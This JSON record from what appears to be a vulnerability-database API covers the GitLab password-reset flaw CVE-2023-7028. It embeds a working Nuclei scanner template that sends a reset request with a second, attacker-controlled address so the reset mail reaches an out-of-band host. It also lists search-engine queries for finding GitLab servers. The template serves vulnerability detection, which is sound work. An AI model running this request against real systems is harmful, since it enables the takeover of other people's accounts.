{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2023-7028/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2023-7028/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2023-7028/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2023-7028/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2023-7028/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2023-7028"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2023-7028"
    }
  },
  "enrichments": {
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2023/CVE-2023-7028.yaml",
      "nuclei_template_severity": "high",
      "nuclei_template_yaml": "id: CVE-2023-7028\n\ninfo:\n  name: GitLab - Account Takeover via Password Reset\n  author: DhiyaneshDk,rootxharsh,iamnooob,pdresearch\n  severity: high\n  description: |\n    An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.\n  impact: |\n    Unauthenticated attackers can send password reset emails to unverified email addresses, enabling account takeover by intercepting the reset link sent to an attacker-controlled email.\n  remediation: |\n    Upgrade GitLab to version 16.1.6, 16.2.9, 16.3.7, 16.4.5, 16.5.6, 16.6.4, 16.7.2, or later depending on your version.\n  reference:\n    - https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/\n    - https://x.com/rwincey/status/1745659710089437368?s=20\n    - https://gitlab.com/gitlab-org/gitlab/-/issues/436084\n    - https://hackerone.com/reports/2293343\n    - https://github.com/V1lu0/CVE-2023-7028\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2023-7028\n    cwe-id: CWE-640,CWE-284\n    epss-score: 0.94647\n    epss-percentile: 0.99853\n    cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*\n  metadata:\n    verified: true\n    max-request: 6\n    vendor: gitlab\n    product: gitlab\n    shodan-query:\n      - title:\"Gitlab\"\n      - cpe:\"cpe:2.3:a:gitlab:gitlab\"\n      - http.title:\"gitlab\"\n    fofa-query: title=\"gitlab\"\n    google-query: intitle:\"gitlab\"\n  tags: hackerone,cve,cve2023,gitlab,auth-bypass,intrusive,kev,vkev,vuln\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /users/sign_in HTTP/1.1\n        Host: {{Hostname}}\n\n    extractors:\n      - type: regex\n        name: token\n        group: 1\n        regex:\n          - name=\"authenticity_token\" value=\"([A-Za-z0-9_-]+)\"\n        internal: true\n\n  - raw:\n      - |\n        @timeout: 20s\n        POST /users/password HTTP/1.1\n        Host: {{Hostname}}\n        Origin: {{RootURL}}\n        Content-Type: application/x-www-form-urlencoded\n        Referer: {{RootURL}}/users/password/new\n\n        authenticity_token={{token}}&user[email][]={{username}}&user[email][]={{rand_base(6)}}@{{interactsh-url}}\n\n    payloads:\n      username:\n        - admin@example.com\n        - admin@{{RDN}}\n        - root@{{RDN}}\n        - gitlab@{{RDN}}\n        - git@{{RDN}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - contains(interactsh_protocol, 'smtp')\n\n    extractors:\n      - type: dsl\n        dsl:\n          - username\n# digest: 4b0a004830460221008be5533484aee6bef596cfdd5590e2f7ef17023ab16717d338167abc8672e6c8022100992c8aaa85330d3d89f29bceff9a5aa03629727d626c6b8e1900b911e718e7c0:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2023-7028"
}